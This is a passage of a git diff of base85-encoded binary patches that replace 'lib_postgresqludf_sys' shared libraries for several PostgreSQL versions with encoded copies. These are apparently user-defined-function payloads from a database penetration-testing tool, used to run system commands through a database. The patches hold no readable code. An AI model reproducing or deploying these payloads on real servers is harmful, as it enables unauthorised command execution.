zK;Gabe~&h(2JeL=UK=_?k<JrDgSQnJuh4RhdG_%;x?v;L$nQcPU6MSWiS1Y6?FEPZ
zW6X4b*KrlzuVLp}kSD*(gQp>HOd;FF)QiIq!ymstxNu13q0C6+QKAro$1}GBJcmI_
zaL7BF#N!#IfyZ(q8TsQVVEgHiLGT8z!aE5&+no(zB9Hflk!Ul7zKoQKLG&2_njEJ8
E0?gJcQUCw|

diff --git a/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..520350650fca0f38e1d01948b2ba1a896055be95
GIT binary patch
literal 3168
zcmV-m44?A{oTVpn4=dGbzPs6kKLK*#r-1TkZ!5N2U7|;2J;ES~QBGbygy$Kvo87qC
zA_yQ)*e`=r$hxjP)wa?t#epS;7GfEoQfY?SOAcIOrg9g7F{P7M!M>HWqM~1Ww&%O|
z687b06Bzml&YlGB`QAqN+yvhJ1hyUJZG*wUk}zfcUnV(DNsqWKSL)}nR#St`9c<Zq
zmOYE7wLdRKgagL)yb+pTnN=l;O)I^T*z=?S0h(Whc7ood(pqwAsg%?v&dYLHvXfhx
zb~WlKk)Cq%7wu^BCuSu24|4n2>A&s!<^0UUn>hC04j&`#a3i6CtY)N}GE0INtm*(m
z(Nm35L%D<f#@OvU2C73P^@A8&(L18)szW^G**lYn8ErCNWjHIK>RD{vIZHW}zdTD4
zxS)mxPjUKAnxIw~sr+f8E}Hsd#)s#o&nu!cwTw<vV|fg#%F$pKO!^;$CHLB~ykgt3
zCR-&@3oMxEi<0%#x9tjHQdg_^G{3pA`nCen(SqNf1f?>nLr4n6uc!UI<gGLm&qFFm
z=`ZB7+-A;+TCtqBK>Xx`Fbrb%0r0Q8AP(Npw;qzFb6^11$mriw!!OyZlfTsAGz$fr
zF|N|!PC0Pt^kfV2N}c`J3i4K+tYS3842#a*{YCjga$)1?(&^Xf<V&4HI9MbK{%Gjr
zvqb>shyjsOzMFl@@?6BrH@2zrDYD-{LW%!V4uJR~WdlI*!`Z@d<YI)ssKF#Rw&jWe
zh5<wINDVFTc!?0DTOg*&Zk<514j36tzAh70>2T8fL@NVy4j?JYVffy>TS13XS_2vp
zHUC-hKyCrORZKP&6ZQq9fD`r0lEhn=$68FuK8!ZYt5l_VyWigEb;t<-3gsQQ*Br05
z*1PRJNW3|+wIv?F>Ip(T;)-%Dm5L<nwt0Q_f3r(9&DJ@WG7Yo`6En8A%91elG_okN
zMy&yqCbQM;_S%@u=`gC2Pv#Va3Wq3l6LUBADZ6q?atYZKa>y-%DiIbLq>=5-%;)gi
z?M3`~tDE_}LA!_f?ZP-e_5>5Yjm*&(mwe0^3<P|-m+B&6{+`3@0ByDsA&-MfNF)O6
z7OOP&xn+jJVo^v6nze!O@Z)#b?J!M;69|)f9^Jv!5h%UQWAK{iOvy3rwk_AyczqpL
zsLIp8maZcqwkK6iXq)dbm3TA^`B!A=hm~*K#Q(*Q@kPe9J;ogPufI#y88^+Xfyu6s
zm}cKE>k$sQ4Ic)dRp$)Z$Z@LQUe+(96r0MG>4Lk77;naSF=|am<r-8+S{P(UQdLlH
zU_OoAaWQQ36yQrvzi}~(#W4>h&<TOl8@+g(?CpA|mi~2|X^Q>ew0C2BrvpHHG3fz&
zoF!v=SpOp6^u4@rF@9orr^TjtoLQ7`!4`o-d@+m2IN-F<^@7t~+juc_5;Exgqrm}e
zws{ln=FUvChJ_%#ls8+poRrg*&#AT%?XfXQ<Thi#ij&x#Bd2Y<vC2g*jQ7&3iQVWP
zSk&=hQ5<RvqD^7tO(_Og{^I+&jMc=67E!*7%U4CQa)=P;O$m81q%ypn%P&SwI>rJc
zzH|*%<XE_KsBA1O+`<~{vYctir6b0x&PB)!x%_|RSYI&VO*2MrFGHWp<&Xl9W|tn?
z*>(Bia>!I(xAXY9b12RdLjh4JJl@XZ=S?F-Am{N6`3}gt2mB*BESv-e{3FIG%ekM&
zFiplYR-mNZ+y+Fg@xlJWH_$Z7$g2_hpWSS{lJN^Uu&WR4y3P-<U>s(ZP=<AjZ9-_`
zZU$Lk4CPzH`~PFFzVFt&-wwrR>gb3tNxT5!H8j#M2Y-f+k)iTkY>b__4?zuY+f^R#
zMiK8=!Xf(}Cmm8c;ov&qKuBXd0ERO<%42mtCO_3q?$uvopdOK2w{Y52;r5nw1mP%|
zH_1-n;A$RERKn{AC)_;)d5PgRI-T2<MwFkMM6$*VEbCpH>!@r+sVBRd4FV~+S}ggH
zu$x5V^x=lbc^syWFpQD1>yc`FmM=08sIoBm>k6_e*=Xwi9Wc12NGYB`z+Lt<6xTHC
zMHGsoq4U8Ub`cXpjJ?2(?OPn7%b&k&x&!$;uv`+A@?5e$xX@sVqoPS2ir_pxoo)(|
zO)RKH)C~E=@=*3$tyD0jq3w^1G`1pP+V+|=8bb(3hi`TOq4HA(cE!-I=~oJ)3s^O9
zYlT(%lvo$o=%pVh0l1<Np}#NAboLmpDG6V`ib1Mj3j@V>$EU_wVz+S$Bax}R27Hci
zZC&A1D^1{poV_z)x-vT0g@(G7B0a*aWvb{Z0XH3tim^%xksnqjwA5ACuP(m}<p?PB
zPLBHM!ou*T-r`sF%jfTeNcAczE{|vaBfCW_202zb`&7?+yRs-+B?UZA6|~`^ItB=U
z+jkP`vs)!W6-|*b*<I`riMH&gXQ?G7Q!njsO-7R;jFlK$XK(;uR(X6d;56z-L|JAB
z+em!?`$c^~Lpgh%On_l<P%p}b`QU1{7Q|jV1L3ij8XLdqNg7GDrQ<B)n&79VN;0g8
zQWTnHRwEC&rxwK2VKi(k-sKXVJ;_tQw~B4B3AK8o^^X*1t-i#`bS5e?hFKXd@;WcY
z(ZS{=2Mo=F%@Ws12xgiD27k@XSvwok78MTUKYAXNWli-_&Rihu!ML5eH6AMq)k0}@
zmL4B%QX(}fvUEJ%Qe4R^tV`by9;v0t*u)iT`zoF)%B^FRjj$CwPURk|j#Ey+<nF7<
zZkRvaFRP>?I+kAfAE-xV0ExWUNoH>oE2%H-o&B0~l+WjBtinC<u@7>!;lku-GNYo3
zR__<|#q#vi+cS@lW9-f2J^5UQI`;zB2}ui)10tq26!O%IPSY(FEHW!bSraVtq_5GX
zE}B@B6;(BN^8_oP*Dc9l&ZZU|yAe`DG0W#=Qvm_yuNVxAH13`V&-?^v+_$I`4hF?-
zS<XKs=nTc|jB2ZtrOs}7LNYTXh<bbHzvD}Vp;+A1k(kt<T;4qVkHmP0&!X|0I#5D4
z17`8Jh~oqQMB=Y*|5l|Ol=uPSy~LN(2$?b<uRHuv;t<e#@wiS32}?sP#d8vwhKbo(
z(@BFDRNB6P+R={2<rz`Q%^{JOTAL-=JZx#+E-gzEl4Z|6>No7c*~;9^QpU2J^g8d6
zY7RNaRke@wCvw?cD!=4~w5_He`u9X=#c2w3Pq2tcIoS1s*z%n8<$V+*nSI0WUZPar
z;`ejWzcvul`ZC%D3#d|T#Yp4Y%@Q7_nm76k!`b>Ds8Rz4Sii-VkM!@80ml!vJv<Wa
zTkJx7!`s3U=6C7uTS7qR>Jy~`*P!Vlv7hZ&-2Ier$@_0Z3>N>`L{*iK*kBxf!ntz>
zi1TUgcd+-x-FDu^VtMw!lPBt7co@G>5L>(oIS%hGol))?x{Trx<ETE|2%uuPlNX;+
z?om&U$Ue+QxCrTFUdjYHh)huObO=Y-S1sxVWT>7kmmq4;w!tJnO>(nHjr{=6^O`iB
zkIC66J7%=!VKhsV7eUc&qSZTbqH;SVi2*b8Nzo9A9XqFpL0S5WSA%_EG)t2gLD7;f
z;>@rM@#6cZ%vHD7yR4p8^UU{}H0In)Bx`3(c$^Ctldbj4?D5J845O#TBj4f;NX((5
zXP2DTfRmYINd<jmn|h~%T-Ot@`+QNa7>Hky&JYNESam_S%*^~-6UMQVnfV6T?Dz5<
zn%VA@V*wPiA`MCSERqL2vikkjjpB_Pxyk0|jj&0(6Xe)b^FZM`C!`EuOxwK8%?XeE
zK#zD0diN^GZteXX@;2sAhEgKMUU)vGhLk~>pSZ*Oit>9$<X6bezKNTq`gw7=blMR!
z-Q`-pTAX3hD`O2}3o8sDlT+erkuUvSC_XA>zd4mvn8*;6k>j8(Nz_nboNYO(@8D$F
zqvEs<;3Oue!Qq>IVlDM1Wt=><j}U6#Ll@>x{S(#T1x<Rj6ynV&u@Q1{2-l#x^r1&X
z0djE+a~IrC0VFD8;)v#URbYA7uE7@XqxHC#O1RboK7(j?Wn*z6xGctJ^ZWCHlrf9j
z!^9#?514G*5rW&V`sEB@;o1;_`;FRI!0`n6eGXWkuE8GMjuq_T{=q^8=t2)opG36*
zcGp2ALWS!O$4W=cF3RZP+XyZ7aAWTB`VfLdt=gNb%D@)ygSGo%?cAL<KJ@Aj2mXA_
G)>JLgQAxf4

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so
deleted file mode 100755
index 02e7e09bac796e627bbf907b9287a936b224c919..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7704
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
F|8J&iJ_P^(

diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..996fdf0dc4c78cb935897cc207f7f9bb0883668d
GIT binary patch
literal 3083
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
ZlkEVn@T#ud2)VpI_WQoY{@<n)L3*NuO&S0I

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so
deleted file mode 100755
index 5dd842a4b5b2458070aa4681bfaadaf8dfc48c8f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7704
zcmcIp3vg7`89sSIRM<p<7(roqSsZnTjet?4&E^3&7~50`S^?K(vzrYh*|@twV6bGm
zl5!2J8OJ)*+9|D88K*kv)EDDGB#=O-Dxz5Iw89jvcR>p%0t&MI{<HtD*DGkJ)Bc&W
z-}#^C^`CR@y;)ULH#0XUM+xPr?<?YZhh!xctXOw3R{#~NTovGVq`E}g7JQ}pMr~zD
zRwSsDTMMX-K`5Q9?<~p61vlhsGqsUX{D>vL4eYmp{RDe>D1wFAFslCjL}Nbc4_=rR
zII)rK1j&}@$MB=}{!^0nCc<G73i+OgG7cpVWdaJ(`B_lX&IRDVhccAq#X#<=Dnk8I
zl<};)oN+L)6ouLvgE9g|mT5HVqfmI7)Mcm-Lpc{+;!u3sn#vf*+I(E74@dcOxmf3B
zB)Ev{oLV-`SJjbRrMaT9Q9K&wJr#L{#paM-t{I|IJF2rf8Z*tOr)lo!4Ux^mp7d`X
zw&}nFD=TaEd{}n-+|mA<4vd}s)VN=l{r1@Wy?5Sv>4eCrvX@dvU1bkM&K!L6u&aOQ
z<8L)x`{qXo@vW4H6)dL(ve5;|Gy8lRoOcyKT019^+U*pAzw#XN0yx;?kEQ^i11NU+
zyDZN*<dR?4IpW+!K|s%<*yBv)M7+vjzm?<r9P)Q`6s5`>a>*OYSIT*zGh7(}+S`4K
z<)w}|4czX94tWVD*cL~etsIBq+2jA2?I$?mSS+V`wcG!S<7{%op}kD>2+G;k_a?}P
zsS8x&P_j}=_Q*WcN&YB1)oZO%5ti?v%?)}j3o3~I6sx0|$s^n>$wEELCpqMPs40Gn
zquu*i{se7IkO%%mccPGe!eM`q<#)0DWHJWba*lRaKu2-z;W$0oIy*PR&az)#XZztC
zKgjlUW(`wARJj~>EdK%9FL3m;i{&dFa^?3owMN_g@kAh&@cWg&xve>&{9yo8!DRue
z23nd|gp_~wQvc1NrsjAe6su|p#N(m3s&DeQ2AZ0K{%}WIP_;LabvWveFOT~}%R)}c
z(m>1CZ5B1Rg}xySH@Adhp+F;<Hii<>Ks@1Z3?w>QRX7@3q7XY6Z40Z`)<C<8Ct_{E
z_T}oXKy#wKxlsipF@Jj^=1)ZZiO{kH)m3Ytr6n3v!jmo-31~Y+Y!9`ma6A-RqQZ$#
zON$BzTcYuh3TJzu)u`$S;iga`uG+H(=td&cs@h=~QZ3Dkf}VKPGfnwJ=xP8{w<sRZ
zPAWugjcQh1ZDp0e%v0u>s#l7)5zguF`co?BJN_sj+04{Ar^Bm`k<GY1b5(@%x0Lf=
z_LuN(hkRX$TL&n=D2sFt%Uw%~3Y%QcERq{GIj1U#RfOeq7s;4O-folAoh7u)CZ{_}
zsM98=J_)U{$*B#Y9-CaoOuBV8IXzzpt+&bL4j|nIo7{etZM4bl_wtK2Id3)HM6XS5
zpPwBzxm#Oie|FjAeAH>hUYnecMlIiOliQC3%O<y<*GFt}dDfvoCvEcKIx_!op3of2
z^9X4QZE`x3go<tQi$w@Dk{=dYtB{n|LHc<PIb<Za74~JO=AQ3XnTh%MEgDmS8u4`6
ztMvX1XyWJRfv0Rv@6!Co#8XP8do_QMcuJ-8M$P|&cuL*$dd>fpcuLuHkLGt1PpOpd
z)cl`_r{SgBHNTbkLgMex{3hZlWzzMUf0lSkm2`#XpCq1ABt2R4zaySfBkk7w!^Bfc
zq>DBG0P&OxX{GsliKnGbA2|cT#GesQOPt=X`4z;|(x!K5K1Mt(X}VYQi;1VDOmEcu
zBI0QY)9W>V8}YPs=^pU34n}uDYoS{it9ui<nO%ArdW1S>_+YOZ4D<bt=|*zK92ly^
zD5HDENXV_B=;5KEMzXiiFbj$y$?Qh7!KfJB#m4I09q;uQC~!GD`@%(Iswq%%M$;g~
